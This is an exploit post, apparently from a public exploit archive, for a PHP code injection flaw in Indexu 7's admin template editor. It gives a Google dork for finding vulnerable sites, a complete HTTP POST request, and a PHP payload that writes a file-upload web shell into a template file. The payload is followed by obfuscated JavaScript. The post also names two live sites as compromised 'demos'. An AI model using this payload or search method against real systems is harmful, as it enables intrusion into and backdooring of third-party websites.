Indexu 7 PHP Code Injection

`# --------------------------------------- #  
Author : L3b-r1'z  
Title : Indexu 7 Php Code Injection  
Date : 5/30/2012  
Email : [email protected]  
Site : Sec4Ever.com & Exploit4arab.com  
Google Dork : allintext: "Listing by GooglePR"  
Version : N\A  
# --------------------------------------- #  
1) Bug  
2) PoC  
# --------------------------------------- #  
2) Bug :  
The script allow admin to edit file in templates fol. as extention PHP :)  
so an attacker can inject some code in any file (EDITED) .  
NOTE :  
Before you inject code , you should know if the themes is there  
(./templates/KOMET).  
As : http://www.site.com/templates/komet/rows.php  
# --------------------------------------- #  
3) PoC :  
  
In POST b0x Above Of Live Http Header Put : http://www.site.com/admin/db.php  
  
Host: site.com  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Referer: http://site.com/admin/template.php?act=editfile&id=komet&file=rows.php  
Cookie: U_AUTHENTICATED=1; __atuvc=7|22;  
PHPSESSID=6c8ee4251b4d5e252d0030dccdc389a8;  
__utma=111872281.551771833.1338331592.1338331592.1338331592.1;  
__utmc=111872281;  
__utmz=111872281.1338331592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)  
Content-Type: multipart/form-data;  
boundary=---------------------------11662147216064  
Content-Length: 1157  
  
Send POST Content :  
  
-----------------------------11662147216064\r\n  
Content-Disposition: form-data; name="act"\r\n  
\r\n  
editfile\r\n  
-----------------------------11662147216064\r\n  
Content-Disposition: form-data; name="id"\r\n  
\r\n  
komet\r\n  
-----------------------------11662147216064\r\n  
Content-Disposition: form-data; name="file"\r\n  
\r\n  
rows.php\r\n  
-----------------------------11662147216064\r\n  
Content-Disposition: form-data; name="file_content"\r\n  
\r\n  
<?php\r\n  
echo '<b><br><br>'.php_uname().'<br></b>';\r\n  
echo '<form action="" method="post" enctype="multipart/form-data"  
name="uploader" id="uploader">';\r\n  
echo '<input type="file" name="file" size="50"><input name="_upl"  
type="submit" id="_upl" value="Upload"></form>';\r\n  
if( $_POST['_upl'] == "Upload" ) {\r\n  
\tif(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {  
echo '<b>Upload SUKSES !!!</b><br><br>'; }\r\n  
\telse { echo '<b>Upload GAGAL !!!</b><br><br>'; }\r\n  
}\r\n  
?>\r\n  
<script type="text/javascript" language="javascript">ML="Rjnis/e  
.rI<thzPS-omTCg>:=p";MI=";@E0:?D7@0EI=<<JH55>B26A<8B9F53CF45>814G;5@E0:?DG";OT="";for(j=0;j<MI.length;j++){OT+=ML.charAt(MI.charCodeAt(j)-48);}document.write(OT);</script>\r\n  
-----------------------------11662147216064--\r\n  
  
Snip : http://www11.0zz0.com/2012/05/30/00/788460850.png  
  
Note : Use It On Your Own Risk.  
  
Demo Site's :  
http://telemed24.pl/templates/komet/rows.phphttp://sefid.com.pl/templates/komet/rows.php  
  
Page 2 of about 975,000 results (0.17 seconds) = And More In Google :P.  
  
  
# --------------------------------------- #  
Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The  
Injector , Over-X , Ked-Ans , N4SS1M , B07 M4ST3R , Black-ID ,  
Indoushka .  
# --------------------------------------- #  
  
  
  
remove this note please : this script named indexu 7 web links i write  
the dork you can check it now :D  
  
and the demo site is upload form  
  
and the bug is php code injection , i write p0c to inject upload form  
in the default template :D  
  
and thx you :D  
`